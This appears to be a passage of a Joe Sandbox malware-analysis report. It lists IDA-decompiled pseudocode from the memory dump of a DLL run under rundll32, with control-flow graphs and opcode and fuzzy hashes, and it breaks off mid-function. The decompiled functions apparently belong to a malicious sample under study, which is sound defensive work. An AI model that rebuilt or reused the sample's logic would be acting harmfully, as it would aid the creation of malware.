                                                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                    				intOrPtr* _t51;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t51 = E04C32049(_t19, 0xc);
                                                                                                                                                                                                                                    				if(_t51 == 0) {
                                                                                                                                                                                                                                    					_t21 = 8;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t22 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    					_t1 = _t22 + 0x4c3e058; // 0x56a8600
                                                                                                                                                                                                                                    					_t2 = _t22 + 0x4c3e028; // 0x2df01
                                                                                                                                                                                                                                    					_t24 =  *0x4c3d15c(_t2, 0, 4, _t1, _t51); // executed
                                                                                                                                                                                                                                    					_v8 = _t24;
                                                                                                                                                                                                                                    					if(_t24 < 0) {
                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                    						E04C39039(_t24, _t51);
                                                                                                                                                                                                                                    						_t21 = _v8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t43 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    						_t26 =  *_t51;
                                                                                                                                                                                                                                    						_t4 = _t51 + 4; // 0x4
                                                                                                                                                                                                                                    						_t35 = _t4;
                                                                                                                                                                                                                                    						_t5 = _t43 + 0x4c3e048; // 0xd30c1661
                                                                                                                                                                                                                                    						_t27 =  *((intOrPtr*)( *_t26))(_t26, _t5, _t35, __edi, __ebx);
                                                                                                                                                                                                                                    						_v8 = _t27;
                                                                                                                                                                                                                                    						_t28 =  *_t51;
                                                                                                                                                                                                                                    						_t40 =  *_t28;
                                                                                                                                                                                                                                    						if(_t27 < 0) {
                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                    							_t24 =  *((intOrPtr*)(_t40 + 8))(_t28);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t45 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    							_t7 = _t51 + 8; // 0x8
                                                                                                                                                                                                                                    							_t49 = _t7;
                                                                                                                                                                                                                                    							_t8 = _t45 + 0x4c3e068; // 0x2df05
                                                                                                                                                                                                                                    							_t29 =  *_t40(_t28, _t8, _t49);
                                                                                                                                                                                                                                    							_v8 = _t29;
                                                                                                                                                                                                                                    							if(_t29 < 0) {
                                                                                                                                                                                                                                    								_t30 =  *_t35;
                                                                                                                                                                                                                                    								 *((intOrPtr*)( *_t30 + 8))(_t30);
                                                                                                                                                                                                                                    								_t28 =  *_t51;
                                                                                                                                                                                                                                    								_t40 =  *_t28;
                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t32 =  *_t49;
                                                                                                                                                                                                                                    								 *((intOrPtr*)( *_t32 + 0xa4))(_t32, 0);
                                                                                                                                                                                                                                    								_t24 = _a4;
                                                                                                                                                                                                                                    								_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                                                    								 *_a4 = _t51;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_v8 >= 0) {
                                                                                                                                                                                                                                    							_t21 = _a4;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t21;
                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 49c56717f76b4dade9e95c8f54e43a95601c6e095e0c1a0625ceeae78de3688a
                                                                                                                                                                                                                                    • Instruction ID: bcab6922f367cf011ac5f1615e8955477d178c04546e460222ad7b97cfabaad5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49c56717f76b4dade9e95c8f54e43a95601c6e095e0c1a0625ceeae78de3688a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 652148B5600204EFE714CFA4C888F9A77B9EF8970AF108568F646CB250D775EE05DBA4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 556 4c31a70-4c31a84 557 4c31a89-4c31a8e 556->557 558 4c31b25-4c31b2c 557->558 559 4c31a94-4c31a97 557->559 560 4c31ab1-4c31ab4 559->560 561 4c31a99-4c31aae 559->561 560->558 562 4c31ab6-4c31abb 560->562 561->560 564 4c31b18-4c31b23 562->564 565 4c31abd-4c31acf 562->565 564->558 568 4c31ad1-4c31ade 565->568 569 4c31b0f-4c31b14 565->569 568->569 571 4c31ae0-4c31aee call 4c32049 568->571 569->564 574 4c31af0-4c31afd call 4c35544 571->574 575 4c31aff 571->575 577 4c31b06 574->577 575->577 577->569
                                                                                                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                                                                                                    			E04C31A70(intOrPtr* __eax, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                    				_t37 = 0;
                                                                                                                                                                                                                                    				_t44 = 0; // executed
                                                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                    				_v8 = _t26;
                                                                                                                                                                                                                                    				if(_t26 < 0) {
                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                                                    					__imp__(0xc8);
                                                                                                                                                                                                                                    					_push( &_v12);
                                                                                                                                                                                                                                    					_push(__eax);
                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v8 >= _t37) {
                                                                                                                                                                                                                                    					_t28 = _v12;
                                                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                    						_v8 = _t31;
                                                                                                                                                                                                                                    						if(_t31 >= 0) {
                                                                                                                                                                                                                                    							__imp__(_v16);
                                                                                                                                                                                                                                    							_t44 = _t31;
                                                                                                                                                                                                                                    							if(_t44 != 0) {
                                                                                                                                                                                                                                    								_t44 = _t44 + 1;
                                                                                                                                                                                                                                    								_t46 = _t44 + _t44;
                                                                                                                                                                                                                                    								_t37 = E04C32049(_t31, _t46);
                                                                                                                                                                                                                                    								if(_t37 == 0) {
                                                                                                                                                                                                                                    									_v8 = 0x8007000e;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_push(_t46);
                                                                                                                                                                                                                                    									_push(_v16);
                                                                                                                                                                                                                                    									_push(_t37);
                                                                                                                                                                                                                                    									L04C35544();
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__imp__#6(_v16);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t32 = _v12;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_a4 = _t37;
                                                                                                                                                                                                                                    					 *_a8 = _t44 + _t44;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
• Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 09791f304d7596d1070e2cad5a2244039275363d6dd2a96b50b4efcd88540ca5
                                                                                                                                                                                                                                    • Instruction ID: 35a204ed0099e852b3923d2ae74c019859523b6a621f755931003f073a559f18
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09791f304d7596d1070e2cad5a2244039275363d6dd2a96b50b4efcd88540ca5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9215675A00209FFDB10DFA4D884DDEBBB5FF49316B1441A9E905E7210EB30EA45DB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C38504(void* __eax, void* __ecx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				intOrPtr _t18;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                                                    				char _t38;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t40 =  *0x4c3d340; // 0x56a8d39
                                                                                                                                                                                                                                    				_push(0x800);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push( *0x4c3d238);
                                                                                                                                                                                                                                    				if( *0x4c3d24c >= 5) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					if(__eax == 0) {
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						_t28 = 8;
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						if(_t28 != 0) {
                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                    							 *0x4c3d24c =  *0x4c3d24c + 1;
                                                                                                                                                                                                                                    							L11:
                                                                                                                                                                                                                                    							return _t28;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                                                    						_t38 = _v8;
                                                                                                                                                                                                                                    						 *_a16 = _a4;
                                                                                                                                                                                                                                    						 *_a20 = E04C32496(_a4, _t38); // executed
                                                                                                                                                                                                                                    						_t18 = E04C3A66E(_t35, _t38, _t42); // executed
                                                                                                                                                                                                                                    						if(_t18 != 0) {
                                                                                                                                                                                                                                    							 *_a8 = _t38;
                                                                                                                                                                                                                                    							 *_a12 = _t18;
                                                                                                                                                                                                                                    							if( *0x4c3d24c < 5) {
                                                                                                                                                                                                                                    								 *0x4c3d24c =  *0x4c3d24c & 0x00000000;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t28 = 0xbf;
                                                                                                                                                                                                                                    						E04C3A1B0();
                                                                                                                                                                                                                                    						__imp__( *0x4c3d238, 0, _t38); // executed
                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t23 = E04C3A279(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax);
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					_t28 = _t23;
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				__imp__(); // executed
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t23 = E04C38B94(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax); // executed
                                                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
• Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 98539cf550a2c2924d36ae7902fa147a08c309b3f3a664c41612ddb2bfb31a62
                                                                                                                                                                                                                                    • Instruction ID: ffee09e7f4a58df857354f70d66e50feeb4d057e275347596905163f82816070
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98539cf550a2c2924d36ae7902fa147a08c309b3f3a664c41612ddb2bfb31a62
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A21107A201204EBEB11EF55D884FAA37FDEB48756F004016F902E7150D779EE459BB1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: e43a17e9097d47ef36fb9b26de0ed49ea0b9078825df613cffc98eb58fa58706
                                                                                                                                                                                                                                    • Instruction ID: 93c28dda68366068ec79e272e05c3fbec5b5e43ae90e1721f6e08f43207b066e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e43a17e9097d47ef36fb9b26de0ed49ea0b9078825df613cffc98eb58fa58706
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6212CB5900259FFEB019F94DD84EEEBB7AEB44705F000065E511A6150C7759E05EB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 674962a4bc9a27ac5fb9a572901c775df9df83adbc0775b1d76aed642f4fb702
                                                                                                                                                                                                                                    • Instruction ID: c336d0b37f184ae87539a0b227567b45b19bbe1d2718fa9fa5ae11d497173ea3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 674962a4bc9a27ac5fb9a572901c775df9df83adbc0775b1d76aed642f4fb702
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D2102BA600204BFD721EBA4DC05F9E37BAEB48706F1841A1F605E7190EB70AA008B60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E04C33D0D(intOrPtr* _a4, void* _a8) {
                                                                                                                                                                                                                                    				void _v31;
                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t25 = 6;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				memset( &_v31, 0, _t25 << 2);
                                                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				asm("stosb");
                                                                                                                                                                                                                                    				_t31 = 0; // executed
                                                                                                                                                                                                                                    				_t17 = E04C383B7( *0x4c3d258,  &_v32); // executed
                                                                                                                                                                                                                                    				if(_t17 != 0 && _v31 > 2) {
                                                                                                                                                                                                                                    					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
                                                                                                                                                                                                                                    					_t26 = 0;
                                                                                                                                                                                                                                    					if(_t23 > 0) {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
                                                                                                                                                                                                                                    							_t26 = _t26 + 1;
                                                                                                                                                                                                                                    						} while (_t26 < _t23);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t39 = _t31;
                                                                                                                                                                                                                                    				 *0x4c3d270 = _t31;
                                                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					_t19 = E04C3924F( &_a8); // executed
                                                                                                                                                                                                                                    					__eflags = _t19;
                                                                                                                                                                                                                                    					if(_t19 == 0) {
                                                                                                                                                                                                                                    						__eflags = _a8 - 0x1000;
                                                                                                                                                                                                                                    						if(_a8 == 0x1000) {
                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t21 = E04C37923(_t26, _t39);
                                                                                                                                                                                                                                    					_t40 =  *0x4c3d270; // 0xd448b889
                                                                                                                                                                                                                                    					 *_a8 = _t21;
                                                                                                                                                                                                                                    					if(_t40 != 0) {
                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                    							_push(5);
                                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a4 = 1;
                                                                                                                                                                                                                                    							 *0x4c3d270 = _t21;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: dde90476db401c5555616e5daf5351ac06a98a9d295deae91bbe858792ac13fb
                                                                                                                                                                                                                                    • Instruction ID: 542057783b0805b6d614e895f79b7bf0ab19b67e791069de13ff00709d21084e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dde90476db401c5555616e5daf5351ac06a98a9d295deae91bbe858792ac13fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B113A719102846EFF20DE75CC407BE7BA6EB44356F00453EDC12DA260D375F6858A10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C36A56(intOrPtr __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                    				unsigned int _v24;
                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				unsigned int* _t12;
                                                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                    				signed int _t17;
                                                                                                                                                                                                                                    				unsigned int _t21;
                                                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t24 = __edx;
                                                                                                                                                                                                                                    				__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
                                                                                                                                                                                                                                    				 *0x4c3d238 = __eax;
                                                                                                                                                                                                                                    				if(__eax != 0) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					 *0x4c3d1a8 = __eax;
                                                                                                                                                                                                                                    					_t11 = E04C38F10(__eax, _a4);
                                                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t12 =  &_v24;
                                                                                                                                                                                                                                    							__imp__(_t12);
                                                                                                                                                                                                                                    							__imp__();
                                                                                                                                                                                                                                    							_t21 = _v24;
                                                                                                                                                                                                                                    							_t14 = (_t21 << 0x00000020 | _v28) >> 7;
                                                                                                                                                                                                                                    							L04C3B226();
                                                                                                                                                                                                                                    							_t31 = _t12 + _t14;
                                                                                                                                                                                                                                    							_t16 = E04C37E03(_a4, _t31);
                                                                                                                                                                                                                                    							_t17 = 2;
                                                                                                                                                                                                                                    							_t23 = _t31;
                                                                                                                                                                                                                                    							__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
                                                                                                                                                                                                                                    						} while (_t16 == 1);
                                                                                                                                                                                                                                    						if(E04C36B96(_t23) != 0) {
                                                                                                                                                                                                                                    							 *0x4c3d260 = 1; // executed
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t11 = E04C3225B(_t24); // executed
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t11 = 8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t11;
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 8c7d233ebccfd749b6355849ef92635cccb72a4c7db8f155d002f7de49a2142e
                                                                                                                                                                                                                                    • Instruction ID: 70cff846a8bd7322c2640c44b9291a76a2c4aa405ce591572fb0aca5f6602791
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c7d233ebccfd749b6355849ef92635cccb72a4c7db8f155d002f7de49a2142e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7411C2777042007FE720ABA4DC09B6E76DAEB44352F104528F906D6180EBB4FD1096A1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: aacf028395e99761749461118a9eaaadb6f09fcddacb56a30a20ed249b6159eb
                                                                                                                                                                                                                                    • Instruction ID: 6df16119e649ebe6719572b64460d35293f9521e872c9a2d5d9a5269c8e3ff52
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aacf028395e99761749461118a9eaaadb6f09fcddacb56a30a20ed249b6159eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B601B5B66053116FD3309E6A8C49F3B7F99EB86662F120518F881D7240DBB4DC0196A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E04C321CD(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				signed short _t11;
                                                                                                                                                                                                                                    				signed int _t12;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				signed short* _t21;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_t18 = 1;
                                                                                                                                                                                                                                    				_t26 = 0x4c3d330;
                                                                                                                                                                                                                                    				E04C384D5();
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t8 = E04C312D4(_a4,  &_v8); // executed
                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                                                    					_t14 = 0xd;
                                                                                                                                                                                                                                    					_t15 = E04C3809F(_t14);
                                                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                                                    						__imp__( *0x4c3d238, 0, _v8);
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						 *_t26 = _t15;
                                                                                                                                                                                                                                    						_t26 = _t26 + 4;
                                                                                                                                                                                                                                    						_t23 = _t23 + 1;
                                                                                                                                                                                                                                    						if(_t23 < 3) {
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                                                    					E04C384D5();
                                                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                                                    						_t21 =  *0x4c3d338; // 0x56a9b70
                                                                                                                                                                                                                                    						_t11 =  *_t21 & 0x0000ffff;
                                                                                                                                                                                                                                    						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                                                    							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t21 = _t12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return _t18;
